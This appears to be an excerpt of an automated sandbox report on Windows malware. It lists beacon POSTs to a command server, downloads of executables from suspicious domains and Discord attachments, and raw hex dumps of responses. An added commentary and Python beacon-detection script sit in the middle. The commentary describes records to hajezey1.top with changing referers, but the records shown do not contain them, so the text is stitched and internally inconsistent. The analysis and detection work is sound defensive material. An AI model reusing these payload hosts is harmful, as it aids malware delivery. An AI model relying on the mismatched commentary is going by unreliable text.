Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: nusurtal4f.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49854 -> 93.115.20.139:28978
Source: FC0C.exe.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 3AE.exe.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: FC0C.exe.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: D083.exe, 0000002B.00000002.716245668.0000000000F31000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: AdvancedRun.exe.19.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: AdvancedRun.exe.19.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 3AE.exe.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: FC0C.exe.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 3AE.exe.6.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: FC0C.exe.6.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: FC0C.exe.6.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 3AE.exe.6.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: FC0C.exe.6.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: AdvancedRun.exe.19.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: AdvancedRun.exe.19.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: FC0C.exe.6.dr String found in binary or memory: http://fontello.com
Source: FC0C.exe.6.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 3AE.exe.6.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: FC0C.exe.6.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: AdvancedRun.exe.19.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: 60DF.exe, 00000018.00000000.509231538.0000000000442000.00000002.00020000.sdmp, 60DF.exe.6.dr String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: explorer.exe, 00000006.00000000.393764920.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: FC0C.exe.6.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: AdvancedRun.exe, AdvancedRun.exe, 0000001C.00000002.528560998.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000021.00000002.570535756.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000024.00000000.565833998.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.19.dr String found in binary or memory: http://www.nirsoft.net/
Source: sqlite3.dll.29.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: DataSvcUtil.exe, 00000022.00000000.568099425.0000000000402000.00000040.00000001.sdmp, SMSvcHost.exe, 0000002A.00000002.634272090.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: 60DF.exe, 00000018.00000000.509231538.0000000000442000.00000002.00020000.sdmp, 60DF.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
Source: 60DF.exe, 00000018.00000000.509231538.0000000000442000.00000002.00020000.sdmp, 60DF.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
Source: D083.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903196811345395712/6058E8D5.jpg
Source: 3FD8.exe, 00000015.00000000.493097245.00000000002F2000.00000002.00020000.sdmp, 3FD8.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903333369742491648/1E88D378.jpg
Source: 37D8.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg
Source: 37D8.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg
Source: FC0C.exe.6.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903579324031074365/ECF88C37.jpg
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AdvancedRun.exe.19.dr String found in binary or memory: https://sectigo.com/CPS0C
Source: AdvancedRun.exe.19.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: FC0C.exe.6.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 1xVPfvJcrg.29.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: xacokuo8.top
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /263873486.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iyc.jelikob.ru
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903333369742491648/1E88D378.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: GET //l/f/UJ1rynwB3dP17Spz23JR/c8a165d96af5f02e4cac679a1908533dbdcac0e8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
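The POST records above share one shape: a bare POST to /, a form-encoded body whose Content-Length changes on every request, a fixed Internet Explorer 11 User-Agent, and, for hajezey1.top, a Referer naming a different random-looking domain each time. A browser submitting a form to hajezey1.top would carry a Referer on that host, not on isiuwvkkoj.com or pmdvv.com. The script below is an added example and not part of the Joe Sandbox report: it parses request records flattened the way this page renders them (header lines run together) and summarises those traits per Host. The sample records are constructed from the report's own host names, User-Agent and Content-Length values; the example.test control entries and the Chrome User-Agent are invented, and the min_posts threshold is an assumption.

```python
"""Flag loader-style beaconing in flattened HTTP request records.

Added example; not code from the Joe Sandbox report. Sample records are
constructed to mirror the report's entries; example.test is an invented
control, and min_posts is an assumed threshold.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
# Invented control User-Agent (not from the report).
CHROME_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/95.0 Safari/537.36"

# Header names that appear glued to the previous value in a flattened record.
_HEADERS = ["Connection", "Content-Type", "Accept", "Referer", "User-Agent",
            "Content-Length", "Host", "Cache-Control", "Pragma"]
_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(re.escape(h) for h in _HEADERS))


def parse_request(record: str) -> dict:
    """Split 'POST / HTTP/1.1Connection: Keep-AliveHost: x' into method, path and headers."""
    text = record.split("HTTP traffic detected: ", 1)[-1]
    parts = _SPLIT.split(text)
    method, path, _version = parts[0].strip().split(" ", 2)
    req = {"method": method, "path": path}
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        req[name] = value.strip()
    return req


def referer_host(req: dict):
    ref = req.get("Referer")
    return urlsplit(ref).hostname if ref else None


def find_beacons(records, min_posts: int = 3) -> dict:
    """Group bare 'POST /' requests by Host and summarise beaconing traits:
    form-encoded body, one fixed User-Agent, varying Content-Length, and a
    Referer whose host is not the Host being posted to (a fake referer)."""
    by_host = defaultdict(list)
    for rec in records:
        req = parse_request(rec)
        if req["method"] == "POST" and req["path"] == "/":
            by_host[req.get("Host", "?")].append(req)

    findings = {}
    for host, reqs in by_host.items():
        if len(reqs) < min_posts:
            continue
        fake_refs = {referer_host(r) for r in reqs} - {None, host}
        lengths = sorted(int(r.get("Content-Length", "0")) for r in reqs)
        all_form = all(r.get("Content-Type", "").startswith("application/x-www-form-urlencoded")
                       for r in reqs)
        all_ie11 = all(r.get("User-Agent") == IE11_UA for r in reqs)
        findings[host] = {
            "posts": len(reqs),
            "fake_referers": len(fake_refs),
            "length_range": (lengths[0], lengths[-1]),
            "suspicious": all_form and all_ie11,
        }
    return findings


def _post(referer: str, length: int, host: str, ua: str = IE11_UA) -> str:
    """Build a record in the same flattened form the report uses."""
    return ("Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-Alive"
            "Content-Type: application/x-www-form-urlencodedAccept: */*Referer: %s"
            "User-Agent: %sContent-Length: %dHost: %s" % (referer, ua, length, host))


# Constructed records modelled on the report's entries.
SAMPLE_RECORDS = [
    _post("http://isiuwvkkoj.com/", 214, "hajezey1.top"),
    _post("http://pmdvv.com/", 163, "hajezey1.top"),
    _post("http://jyoho.org/", 323, "hajezey1.top"),
    _post("http://fpdmgcvxb.com/", 221, "hajezey1.top"),
    _post("http://fxurvqy.com/", 336, "hajezey1.top"),
    _post("http://nusurtal4f.net/", 334, "nusurtal4f.net"),
    _post("http://nusurtal4f.net/", 205, "nusurtal4f.net"),
    _post("http://nusurtal4f.net/", 218, "nusurtal4f.net"),
    ("Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-Alive"
     "User-Agent: %sHost: sysaheu90.top" % IE11_UA),
    # Invented control: a browser posting a form back to the site it came from.
    _post("https://example.test/", 88, "example.test", CHROME_UA),
    _post("https://example.test/", 91, "example.test", CHROME_UA),
    _post("https://example.test/", 90, "example.test", CHROME_UA),
]

if __name__ == "__main__":
    for host, summary in find_beacons(SAMPLE_RECORDS).items():
        print(host, summary)
```

Run as a script it prints one summary per host. The fake-referer count is the strongest trait for hajezey1.top; nusurtal4f.net passes that check because its Referer matches its Host, which is why the rule also keys on the fixed User-Agent and the run of bare form-encoded POSTs rather than on the referer alone.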
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 29 Oct 2021 15:55:28 GMTContent-Type: text/htmlContent-Length: 797Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:54:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f1 11 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:54:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f 